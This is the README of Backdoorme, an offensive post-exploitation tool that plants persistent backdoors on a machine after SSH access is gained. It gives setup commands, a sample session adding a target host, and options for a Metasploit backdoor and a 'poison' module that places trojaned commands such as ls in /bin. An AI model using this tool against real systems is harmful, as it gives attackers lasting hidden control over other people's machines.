backdoorme Build Status

Tools like metasploit are great for exploiting computers, but what happens after you've gained access to a computer? Backdoorme answers that question by unleashing a slew of backdoors to establish persistence over long periods of time.

Once an SSH connection has been established with the target, Backdoorme's strengths can come to fruition. Unfortunately, Backdoorme is not a tool to gain root access - only keep that access once it has been gained.

Please only use Backdoorme with explicit permission - please don't hack without asking.

Usage

Backdoorme is split into two parts: backdoors and modules.

Backdoors are small snippets of code which listen on a port and redirect to an interpreter, like bash. There are many backdoors written in various languages to give variety.

Modules make the backdoors more potent by running them more often, for example, every few minutes or whenever the computer boots. This helps to establish persistence.

Demonstration:

Bash Demonstration

Setup

To start backdoorme, first ensure that you have the required dependencies.

For Python 3.5+:

$ sudo apt-get install python3 python3-pip python3-tk nmap                                 
$ cd backdoorme/
$ virtualenv --python=python3.5 env
$ source env/bin/activate
(env) $ pip install -r requirements.txt

For Python 2.7:

$ sudo python dependencies.py

Getting Started

Launching backdoorme:

$ python master.py

To add a target:

>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
 + Target 1 Set!
>>

Backdoors

To use a backdoor, simply run the "use" keyword.

>> use shell/metasploit
 + Using current target 1.
 + Using Metasploit backdoor...
(msf) >>

From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword.

(msf) >> show options
Backdoor options:

Option      Value       Description     Required
------      -----       -----------     --------
name        initd       name of the backdoor        False
...
(msf) >> set name apache
 + name => apache
(msf) >> show options
Backdoor options:

Option      Value       Description     Required
------      -----       -----------     --------
name        apache      name of the backdoor        False
...

As in metasploit, backdoors are organized by category.

Modules

Every backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword.

(msf) >> add poison
 + Poison module added

Each module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options.

(msf) >> help
...
Poison module options:

Option      Value       Description     Required
------      -----       -----------     --------
name        ls        name of command to poison     False
location /bin       where to put poisoned files into        False

Currently enabled modules include:

Targets

Backdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target. Run "list" to see the list of current targets, whether a connection is open or closed, and what backdoors & modules are available.

Contributing

Backdoorme is still very much in its infancy! Feel free to contribute to the project - simply fork it, make your changes, and issue a pull request. Have an idea for a killer backdoor, or something we could improve? Make an issue and we'll add it ASAP! Please email us at backdoormegit@gmail.com with any questions.

If you wish to add your own backdoor, follow the directions given in the backdoorme/backdoors/template.py file.

If you wish to add your own module, follow the directions given in the backdoorme/modules/template.py file.

Cheat Sheet for developers: